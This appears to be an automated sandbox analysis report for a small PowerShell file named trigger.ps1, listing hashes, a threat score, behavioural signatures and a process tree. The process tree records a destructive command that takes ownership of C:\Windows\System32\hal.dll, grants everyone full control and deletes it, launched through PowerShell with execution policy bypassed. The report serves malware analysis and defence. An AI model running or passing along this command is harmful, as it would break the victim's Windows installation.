Overview

overview

8

Static

static

1

trigger.ps1

windows7-x64

8

trigger.ps1

windows10-2004-x64

8

Analysis

  • max time kernel
    16s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    15/07/2024, 14:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    trigger.ps1

  • Size

    142B

  • MD5

    3981277c3f6d65f3351a8709ae9b1a6d

  • SHA1

    35f1475f69a389a1a2480f3ecef78a7a46c93083

  • SHA256

    4dd70bda2372eb7a20baca37320e246c2e6baf3ad622c558df3e70cb91bed8b2

  • SHA512

    a5babc6cda3817f7f74b40568672dd2fb25284bcd493d4bcbd25c621e9ffc71897f239b968fed0c5f526c2e40bc88ef7a62cdc9e7387942cbb172486935d3435

Score
8/10
discoveryexecutionexploit

Malware Config

Signatures

  • Possible privilege escalation attempt 2 IoCs
    exploit
  • Modifies file permissions 1 TTPs 2 IoCs
    discovery
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\trigger.ps1
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1048
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\hal.dll && icacls C:\Windows\System32\hal.dll /grant Everyone:(F) && del/f C:\Windows\System32\hal.dll"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1728
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\hal.dll
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2832
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\hal.dll /grant Everyone:(F)
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2824
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    1⤵
      PID:2492
    • C:\Windows\system32\AUDIODG.EXE
      C:\Windows\system32\AUDIODG.EXE 0x56c
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2060

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1048-4-0x000007FEF631E000-0x000007FEF631F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1048-7-0x000007FEF6060000-0x000007FEF69FD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1048-6-0x0000000002290000-0x0000000002298000-memory.dmp

      Filesize

      32KB

      Download

    • memory/1048-5-0x000000001B970000-0x000000001BC52000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/1048-9-0x000007FEF6060000-0x000007FEF69FD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1048-8-0x000007FEF6060000-0x000007FEF69FD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1048-10-0x000007FEF6060000-0x000007FEF69FD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1048-11-0x000007FEF6060000-0x000007FEF69FD000-memory.dmp

      Filesize

      9.6MB

      Download